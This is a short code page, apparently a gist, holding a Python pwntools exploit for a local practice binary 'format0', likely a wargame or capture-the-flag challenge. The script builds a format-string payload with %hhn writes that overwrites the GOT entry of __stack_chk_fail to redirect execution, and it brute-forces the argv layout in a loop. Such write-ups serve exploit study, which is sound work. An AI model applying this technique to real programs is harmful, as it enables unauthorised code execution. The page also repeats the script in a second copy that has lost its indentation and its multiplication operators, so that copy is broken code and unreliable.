wbowling · November 18, 2017 13:12
diff --git a/format0.py b/format0.py
 #!/usr/bin/env python2
 """
 Overwrite the GOT entry for __stack_chk_fail with 0x40061a so we jump there instead.

 The address can be passed in via argv, we cant use nulls but we can use blank strings instead.

 As the argv location is semi random, it takes around 500 iterations which is pretty reasonable for 64bit

 """

 from pwn import *

 context.log_level = "warn"

 payload = "a"*6 + "%262$hhn" + "a"*(0x1a-6) + "%263$hhn"
 payload = payload.ljust(90, "a")

 def exploit():
  line = p.recvline()
  if "correctly" in line:
    print line
    exit()

 if __name__ == "__main__":
  name = "./format0"
  i = 0
  while True:
    i += 1
    print i
    try:
      p = process([name, payload, p64(0x601021)[:3], "", "", "", "", p64(0x601020)[:3], "", "", "", "", "", "a"*4], env={})
      exploit()
    except Exception as e:
      p.close()
	#!/usr/bin/env python2
	"""
	Overwrite the GOT entry for __stack_chk_fail with 0x40061a so we jump there instead.

	The address can be passed in via argv, we cant use nulls but we can use blank strings instead.

	As the argv location is semi random, it takes around 500 iterations which is pretty reasonable for 64bit

	"""

	from pwn import *

	context.log_level = "warn"

	payload = "a"6 + "%262$hhn" + "a"(0x1a-6) + "%263$hhn"
	payload = payload.ljust(90, "a")

	def exploit():
	line = p.recvline()
	if "correctly" in line:
	print line
	exit()

	if __name__ == "__main__":
	name = "./format0"
	i = 0
	while True:
	i += 1
	print i
	try:
	p = process([name, payload, p64(0x601021)[:3], "", "", "", "", p64(0x601020)[:3], "", "", "", "", "", "a"*4], env={})
	exploit()
	except Exception as e:
	p.close()